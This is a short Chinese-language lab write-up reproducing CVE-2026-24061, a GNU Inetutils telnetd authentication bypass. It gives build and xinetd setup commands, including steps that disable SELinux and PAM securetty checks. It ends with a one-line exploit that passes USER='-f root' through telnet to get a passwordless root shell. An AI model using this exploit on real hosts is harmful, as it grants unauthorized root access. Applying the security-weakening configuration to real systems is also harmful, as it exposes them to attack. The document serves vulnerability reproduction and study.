https://mp.weixin.qq.com/s/PA5EhntsCyWfQT2kTE1yNA
https://www.openwall.com/lists/oss-security/2026/01/20/2
漏洞概述
CVE-2026-24061 是一个存在于 GNU Inetutils 版本 2.7 中的严重漏洞,允许攻击者通过 USER=’-f root’ 参数在无需密码的情况下获得 root 权限的 shell。本文将详细介绍如何在受控环境下搭建和复现此漏洞。
受影响版本:
1.9.3 <= GNU Inetutils <= 2.7
环境搭建
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
|
//安装编译环境
sudo yum groupinstall "Development Tools" -y
sudo yum install ncurses-devel pam-devel -y
//下载解压源代码
cd /tmp
wget https://ftp.gnu.org/gnu/inetutils/inetutils-2.7.tar.gz
tar -xzf inetutils-2.7.tar.gz
cd inetutils-2.7
//启用telnet并禁用不必要的服务
./configure \
--prefix=/usr/local \
--enable-telnetd \
--disable-hostname \
--disable-ping \
--disable-ping6 \
--disable-traceroute \
--disable-rcp \
--disable-rexec \
--disable-rlogin \
--disable-rsh \
--disable-syslogd \
--disable-talk \
--disable-tftp \
--disable-uucpd \
--disable-ftp \
--disable-ftpd
//编译与安装
make -j$(nproc)
sudo make install
//启动存在漏洞服务
sudo yum install xinetd -y
//创建 /etc/xinetd.d/telnet 文件:
sudo tee /etc/xinetd.d/telnet <<EOF
service telnet
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/local/libexec/telnetd
log_on_failure += USERID
}
EOF
//修改安全设置
echo -e "pts/0\npts/1\npts/2\npts/3" >> /etc/securetty
sudo sed -i 's/^auth.*pam_securetty.so/# &/' /etc/pam.d/login
sudo setenforce 0
sudo systemctl restart xinetd
|
环境复现
1
|
USER='-f root' telnet -a 192.168.66.152
|
